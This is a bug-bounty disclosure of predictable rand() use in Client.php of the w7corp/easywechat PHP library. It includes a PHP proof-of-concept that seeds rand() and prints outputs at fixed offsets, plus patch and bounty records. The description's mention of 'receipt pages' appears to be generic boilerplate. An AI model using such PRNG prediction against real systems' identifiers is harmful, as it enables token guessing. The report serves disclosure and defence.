Use of Predictable Algorithm in Random Number Generator in w7corp/easywechat

Valid
Reported on Jun 28th 2021

✍️ Description

Insecure randomness errors occur when a function that can produce predictable values is used as a source of randomness in security-sensitive context. This code uses the rand() function to generate "unique" identifiers for the receipt pages it generates. In this case the function that generates weak random numbers is rand() in Client.php at line 47

🕵️‍♂️ Proof of Concept

//POC.php

#!/usr/bin/env php
<?php

if($argc < 3)
{
    print($argv[0] . ' <seed> <n>' . "\n");
    print('' . "\n");
    print('Parameters:' . "\n");
    print('  seed:   Seed to initialize rand() with' . "\n");
    print('  offset: Number of calls to rand() before printing the first');
    print(' output' . "\n");
    print('' . "\n");
    print('Output:' . "\n");
    print('  <offset>\'s call to rand() and <offset+227>\'s call');
    print(' to rand()' . "\n");
    exit();
}

rand($argv[1]);
for($i=0;$i<$argv[2];$i++)
    rand();

print rand() . " ";
for($i=0;$i<226;$i++)
    rand();
print rand() . "\n";

💥 Impact

The random number generator implemented by rand() cannot withstand a cryptographic attack. Because rand() is a statistical PRNG, it is easy for an attacker to guess the strings it generates.

Akshay Jain submitted a
a month ago
Akshay Jain
a month ago

Researcher


For Patch, Pull this: https://github.com/w7corp/easywechat/pull/2131

安正超 validated this vulnerability a month ago
Akshay Jain has been awarded the disclosure bounty
$150
The fix bounty is now up for grabs
$37.5
安正超 confirmed that a fix has been merged on f65c5e a month ago
Akshay Jain has been awarded the fix bounty
$37.5